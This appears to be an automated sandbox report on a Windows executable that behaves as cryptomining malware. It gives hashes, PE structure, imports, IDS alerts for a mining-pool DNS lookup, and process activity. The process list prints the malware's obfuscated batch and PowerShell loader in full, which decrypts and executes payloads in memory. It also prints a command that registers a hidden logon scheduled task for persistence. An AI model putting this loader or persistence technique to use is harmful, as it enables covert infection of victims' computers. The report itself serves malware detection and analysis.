                                    SHA-512:C8211787681DBD34A2D2D2B56F8D49F1DAADD28CC13B6EDD9BA2E57CA4C76C93FE9363419D09032D167085215EB8E8C85D7EB3515AB96EE3EB6A6A39702EBF82
                                    Malicious:false
                                    Preview:@echo off..set "geyBcW=sezSPYdt zSPYdAzSPYdNzSPYdvTzSPYd=zSPYd1zSPYd zSPYd&&zSPYd szSPYdtzSPYdazSPYdrtzSPYd zSPYd"" zSPYd/mzSPYdin zSPYd"..set "HbaGpB=&&zSPYd zSPYdexzSPYditzSPYd"..set "CknmIU=nozSPYdt zSPYddezSPYdfizSPYdnzSPYdedzSPYd AzSPYdNzSPYdvTzSPYd..if %CknmIU:zSPYd=% (%geyBcW:zSPYd=%%0 %HbaGpB:zSPYd=%)..::YfD3eZnQ7o+pPBnDFdch5JczLrV51pLLjUwJy8Pe2UkEt20KkcDbcn/8+b7U52m0B9TX4briXbDMicSThYTX/grYYlC5LrnF8KShoSFpZy5bJmXmHYShEDMEcob94zfslJCh90rXIU7qRyCnnD18cOnI6A++1S06YWaSqraDtEjq555q4ci2NUXD1AIMHWnGx5LDpzvhHX4sp5kv1cD57bcPcuxpAzTfXqMnCI5nMlxTPwl/C6asY099VbbaI5rN7h6bKrjCg3VSZ7O0MM7WZOSHgLIoIUL73eowNwt/ubDeRn0u3gn+5hsA1TmA6z7d1pv602sBKHmWtxUVKNVm9U/eOdOPnTCDuDg4NXk5Mswd2Wqk/Gq9sUeKEFiIneG6hVMfWSIvbmZQTS3XL74dg9CXHH2fiLF2oYQw+5RDRmVSovSJIxWmVeB7Shu/wcoBrqmrGv3TpfxXoa3nxBMX5n/wcYTXR7EyBnbOB1XiV/hfKlqI3XB7kr18usQlFYJDjTGiRmCVsUdPe36lmJpnaNNjy8W84L1mYG5laFBrs5HrxraeVK0Zo3Ll0qObIsop9FOVoa2TcGsNDwkFcVmSlWdDvAU+bSoMJaAK6P9nAVvzdgmYNUO276meNeabH9ztfYW2IPLOJmYoJ9nTNpjxOlKVBahub/M7PGL0bnVIKBsrnF

                                    \Device\ConDrv

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (2170), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):2172
                                    Entropy (8bit):5.706976468899462
                                    Encrypted:false
                                    SSDEEP:48:sJFbrLKWgSLkV4Dz/65v4CKNOAw0RFRJRx9BVRBVUk/k3/muZ27eVAPgJJYVAPBi:GbF/eQiU7Pnv79BjBuvKZiJzZi
                                    MD5:7B4BC55FE65DF07FFF273C177443129F
                                    SHA1:13963DF4293DC2AC3B9FC0F9E17BFA9C7263910D
                                    SHA-256:8DE36594B5BEA3C0785635D646913473DF7F1C4ED008DB257CC55EFC8F06BDF8
                                    SHA-512:07742D2E098D39456EA25FE31293332667C2987CDD420CED595755ABF01FAC4FF531929F263A916FF17913BB0D3349FD0E9F57D6395FDE87B5C4F9FE20D87E1B
                                    Malicious:false
                                    Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create

                                    Static File Info

                                    General

                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):7.9617541743927625
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:5'553'078 bytes
                                    MD5:6d075d047098d57266aa59b97d288bda
                                    SHA1:1cb3eabf3ddbf47ea0f9eebac64b6689f7645cc1
                                    SHA256:fabd087044389ec6e9d7e11f59687c9527e0aec25a83f8dae30da8404efe0e39
                                    SHA512:9167cabbeca956b977d2ec2e88f8d1c03511d2271850df7e1d01e1b2fd76ac4534e782c236ad28fe92cee94b289a8c8ba74f1ec35b9028b70339adc4af3dfa69
                                    SSDEEP:98304:+3G06n81vgUXP6+UXGLVk+3UXLtIhLuzXAapVgPrvqE3LDvuseWMeX:+3Gdn4oQP6L+3MLOJuzXXTgzP3ZeWF
                                    TLSH:7446330AFBA505F9E1A7A278CE470D16E2797C4D53718ACF2362162E1F273608E3B751
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

                                    File Icon

                                    Icon Hash:1515d4d4442f2d2d

                                    Static PE Info

                                    General

                                    Entrypoint:0x140032e60
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x65DC537B [Mon Feb 26 09:01:47 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:2
                                    File Version Major:5
                                    File Version Minor:2
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:2
                                    Import Hash:b1c5b1beabd90d9fdabd1df0779ea832

                                    Entrypoint Preview

                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    call 00007F2698867B98h
                                    dec eax
                                    add esp, 28h
                                    jmp 00007F269886752Fh
                                    int3
                                    int3
                                    dec eax
                                    mov eax, esp
                                    dec eax
                                    mov dword ptr [eax+08h], ebx
                                    dec eax
                                    mov dword ptr [eax+10h], ebp
                                    dec eax
                                    mov dword ptr [eax+18h], esi
                                    dec eax
                                    mov dword ptr [eax+20h], edi
                                    inc ecx
                                    push esi
                                    dec eax
                                    sub esp, 20h
                                    dec ebp
                                    mov edx, dword ptr [ecx+38h]
                                    dec eax
                                    mov esi, edx
                                    dec ebp
                                    mov esi, eax
                                    dec eax
                                    mov ebp, ecx
                                    dec ecx
                                    mov edx, ecx
                                    dec eax
                                    mov ecx, esi
                                    dec ecx
                                    mov edi, ecx
                                    inc ecx
                                    mov ebx, dword ptr [edx]
                                    dec eax
                                    shl ebx, 04h
                                    dec ecx
                                    add ebx, edx
                                    dec esp
                                    lea eax, dword ptr [ebx+04h]
                                    call 00007F26988669B3h
                                    mov eax, dword ptr [ebp+04h]
                                    and al, 66h
                                    neg al
                                    mov eax, 00000001h
                                    sbb edx, edx
                                    neg edx
                                    add edx, eax
                                    test dword ptr [ebx+04h], edx
                                    je 00007F26988676C3h
                                    dec esp
                                    mov ecx, edi
                                    dec ebp
                                    mov eax, esi
                                    dec eax
                                    mov edx, esi
                                    dec eax
                                    mov ecx, ebp
                                    call 00007F26988696D7h
                                    dec eax
                                    mov ebx, dword ptr [esp+30h]
                                    dec eax
                                    mov ebp, dword ptr [esp+38h]
                                    dec eax
                                    mov esi, dword ptr [esp+40h]
                                    dec eax
                                    mov edi, dword ptr [esp+48h]
                                    dec eax
                                    add esp, 20h
                                    inc ecx
                                    pop esi
                                    ret
                                    int3
                                    int3
                                    int3
                                    dec eax
                                    sub esp, 48h
                                    dec eax
                                    lea ecx, dword ptr [esp+20h]
                                    call 00007F2698855F43h
                                    dec eax
                                    lea edx, dword ptr [000257C7h]
                                    dec eax
                                    lea ecx, dword ptr [esp+20h]
                                    call 00007F2698868792h
                                    int3
                                    jmp 00007F269886E974h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe3bc.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x466ee0x4680027edb25a1bc32573014bf3adb5cecc24False0.536860039893617data6.469383562827248IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x480000x128c40x12a00cde5f7a0fae18bcdb38da9f29d7f3313False0.449834836409396data5.269838116965451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x5b0000xe75c0x1a000a420650d3abfc14c296cd4945b33a1dFalse0.28260216346153844data3.2569573130951395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata0x6a0000x306c0x320095c27b680fbce994429e951f39e7a9adFalse0.487734375data5.502914123440489IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .didat0x6e0000x3600x40053c09865fd6da5cc74254921d9575e3dFalse0.259765625data3.025278137091312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    _RDATA0x6f0000x15c0x20058d3584c9c50f7594166c2ade479252fFalse0.40234375data3.307334517307356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x700000xe3bc0xe4001b279dad3e3d77fcdfb269a130bf474bFalse0.6334121436403509data6.778407783727912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    PNG0x706740xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                    PNG0x711bc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                    RT_ICON0x727680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                    RT_ICON0x72cd00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                    RT_ICON0x735780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                    RT_ICON0x744200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                    RT_ICON0x748880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                    RT_ICON0x759300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                    RT_ICON0x77ed80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                    RT_DIALOG0x7bc4c0x2badata0.5286532951289399
                                    RT_DIALOG0x7bf080x13adata0.6560509554140127
                                    RT_DIALOG0x7c0440xf2data0.71900826446281
                                    RT_DIALOG0x7c1380x14adata0.6
                                    RT_DIALOG0x7c2840x314data0.47588832487309646
                                    RT_DIALOG0x7c5980x24adata0.6279863481228669
                                    RT_STRING0x7c7e40x1fcdata0.421259842519685
                                    RT_STRING0x7c9e00x246data0.41924398625429554
                                    RT_STRING0x7cc280x1a6data0.514218009478673
                                    RT_STRING0x7cdd00xdcdata0.65
                                    RT_STRING0x7ceac0x470data0.3873239436619718
                                    RT_STRING0x7d31c0x164data0.5056179775280899
                                    RT_STRING0x7d4800x110data0.5772058823529411
                                    RT_STRING0x7d5900x158data0.4563953488372093
                                    RT_STRING0x7d6e80xe8data0.5948275862068966
                                    RT_STRING0x7d7d00x1c6data0.5242290748898678
                                    RT_STRING0x7d9980x268data0.4837662337662338
                                    RT_GROUP_ICON0x7dc000x68data0.7019230769230769
                                    RT_MANIFEST0x7dc680x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                    Imports

                                    DLLImport
                                    KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                    OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                    gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    04/19/24-03:21:07.355283UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)5797753192.168.2.41.1.1.1

                                    Network Port Distribution

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 19, 2024 03:21:07.355283022 CEST5797753192.168.2.41.1.1.1
                                    Apr 19, 2024 03:21:07.461335897 CEST53579771.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Apr 19, 2024 03:21:07.355283022 CEST192.168.2.41.1.1.10xe38bStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Apr 19, 2024 03:21:07.461335897 CEST1.1.1.1192.168.2.40xe38bNo error (0)pool.hashvault.pro142.202.242.43A (IP address)IN (0x0001)false
                                    Apr 19, 2024 03:21:07.461335897 CEST1.1.1.1192.168.2.40xe38bNo error (0)pool.hashvault.pro142.202.242.45A (IP address)IN (0x0001)false

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:03:19:00
                                    Start date:19/04/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0x7ff65a350000
                                    File size:5'553'078 bytes
                                    MD5 hash:6D075D047098D57266AA59B97D288BDA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:03:19:01
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" "
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:03:19:01
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:03:19:01
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd"
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:4
                                    Start time:03:19:01
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:5
                                    Start time:03:19:02
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:03:19:02
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:03:19:04
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:03:19:11
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')
                                    Imagebase:0xcc0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:03:19:11
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:03:19:26
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:03:19:26
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:03:19:30
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:03:19:30
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

